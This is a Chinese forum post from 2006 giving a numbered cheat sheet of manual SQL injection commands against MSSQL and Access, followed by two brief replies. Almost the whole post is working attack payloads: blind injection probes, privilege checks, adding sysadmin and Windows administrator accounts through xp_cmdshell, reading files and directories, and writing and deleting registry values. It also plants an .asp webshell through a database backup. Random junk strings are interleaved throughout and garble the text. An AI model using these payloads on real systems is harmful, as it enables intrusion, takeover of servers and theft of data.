社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4581阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 'u<e<hU  
  2.初步判断是否是mssql ;and user>0 Be|! S_Y P  
|Ml~Pmpp  
  3.注入参数是字符'and [查询条件] and ''=' fv7VDo8vb  
Y_Gd_+oJ  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' .hW>#  
NIQ}A-b  
  5.判断数据库系统 XKTDBaON  
{}$rN@OM$  
  ;and (select count(*) from sysobjects)>0 mssql "\@J0 |ppb  
Ve(<s  
  ;and (select count(*) from msysobjects)>0 access dCoP qKy  
9Rk(q4.OP  
>.qFhO\1so  
iLnW5yy  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 4<($ZN8  
^^v3iCT  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 J,Ki2'=  
50MM05aC  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 @m5J%8>k  
WVeNO,?ytS  
  9.(1)猜字段的ascii值(access) !kSemDC  
]S%_&ZMCM  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 FXr^ 4B}  
^(TCUY~f&  
  (2)猜字段的ascii值(mssql) J920A^)j!  
0HWSdf|w  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 KF'fg R  
d7kE}{,  
  10.测试权限结构(mssql) / <(|4e  
~3 bV~H#~m  
{Z/iYHv~#c  
Xgx/ubca0  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 1e[?}q]*  
|6Y:W$7k  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 8~(,qU8-N  
\r IOnZ.WK  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Hpix:To  
+1wEoU.l2  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 0cG[<\qT  
+~V_^-JG&  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- (LK@w9)i;  
!U?C _  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Y)k"KRW+  
Ze%S<xT!O  
  ;and 1=(select IS_MEMBER('db_owner'));-- K ar!  
p1'q{E+o*  
vT#R>0@mi  
q%G[tXw  
  11.添加mssql和系统的帐户 B5 /8LEWw  
"1gIR^S%9  
  ;exec master.dbo.sp_addlogin username;-- Y!j/,FU  
  ;exec master.dbo.sp_password null,username,password;-- ^!B]V>L-  
diNSF-wi,,  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- gN}$$vS  
<zqIq9}r  
  ;exec master.dbo.xp_cmdshell 'net user username password )s>|;K{  
"S#$:92  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- [,U l  
K-]) RIM  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- WblH}  
QyA^9@iVs  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- #Tc`W_-  
Mc c%&j  
3DO*kM1s@  
J ?{sTj"KB  
  12.(1)遍历目录 B4un6-<i  
2`Bb9&ut>  
  ;create table dirs(paths varchar(100), id int) Q.$/I+&j  
P>q~ocq<  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' U>kaQ54/  
(A2ga):Pk  
  ;and (select top 1 paths from dirs)>0 jk`U7 G*  
IsT}T}p,t  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Uhvy 2}w  
:Jyr^0`J  
Pm P&Qje7  
9=}#.W3.  
  (2)遍历目录 )Jvo%Y  
IgJG,!>h  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- |d&Kr0QIV  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 c*#$sZ@YA  
JQ ?8yl  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 x(>XM:|  
jA^yUd-  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 N#-%b"(  
-5e8m4*  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 L2Cb/!z`c  
0>m$e(Z  
alRz@N  
v"2A?  
  13.mssql中的存储过程 MX*4d{l  
lre(]oBXA  
  xp_regenumvalues 注册表根键, 子键 kK6t|Yn&  
IHW s<U  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 N\ <riS9  
}qGd*k0F0  
  xp_regread 根键,子键,键值名 wy|b Hkr_  
i*l =xW;bM  
  ;exec xp_regread xX%{i0E  
I RLAsb3  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 "$5cKbJ  
QX?moW6UW  
  xp_regwrite 根键,子键, 值名, 值类型, 值 yz3=#  
^VzhjKSu  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 7lYf+&JZ  
pbh>RS=ri  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 DQObHB8L  
= <A0;  
  xp_regdeletevalue 根键,子键,值名 ~Q^.7.-T  
hH$9GL{H  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 >8>s K(S]  
??Urm[Y.Z  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 a"}ndrc*  
]/p>p3@1C  
EFU)0IAL[  
ENA"T-p  
  14.mssql的backup创建webshell j7Zv"Vq@  
h+_:zWU  
  use model `}ZtK574  
18~jUYMV  
  create table cmd(str image); 9h+T O_T@F  
>BJBM |  
  insert into cmd(str) values (''); wg k[_i  
3 q8S  
  backup database model to disk='c:\l.asp'; ~mHrgxQ-  
0T@axQ[%  
z2R?GQ5 A  
+ i /4G.=*  
  15.mssql内置函数 Bvj  
U$@}!X  
  ;and (select @@version)>0 获得Windows的版本号 4QC_zyTE  
1D1kjM^Bo  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa ?]*"S{Cqv  
lt'N{LFvc  
  ;and (select user_name())>0 爆当前系统的连接用户 ) C\/(  
)`<&~>qp  
  ;and (select db_name())>0 得到当前连接的数据库 `p)U6J  
 b utBS  
-oZw+ge}  
T#e|{ZCbq  
  16.简洁的webshell N3Q .4? z9  
Z>/ *q2  
  use model W3('1  
]T40VGJ:h  
  create table cmd(str image); u!HbS*jqq  
Ke[`zui@?  
  insert into cmd(str) values (''); h0x'QiCc  
Jz0AYiCq  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
10+5=?,请输入中文答案:十五